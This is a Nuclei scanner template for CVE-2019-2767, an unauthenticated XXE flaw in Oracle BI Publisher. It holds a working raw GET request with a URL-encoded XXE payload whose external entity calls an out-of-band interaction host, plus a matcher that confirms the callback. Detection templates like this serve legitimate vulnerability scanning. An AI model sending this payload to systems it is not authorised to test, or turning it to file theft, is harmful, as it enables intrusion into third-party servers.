id: CVE-2019-2767

info:
  name: Oracle Business Intelligence - Publisher XXE
  author: madrobot
  severity: high
  description: There is an XXE vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware. The supported versions affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. This easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise BI Publisher.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2019-2767
    - https://www.exploit-db.com/exploits/46729
    - http://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cve-id: CVE-2019-2767
  tags: cve,cve2019,oracle,xxe,oast

requests:
  - raw:
      - |
        GET /xmlpserver/convert?xml=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+"http%3a//{{interactsh-url}}/xxe.xml">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the HTTP Interaction
        words:
          - "http"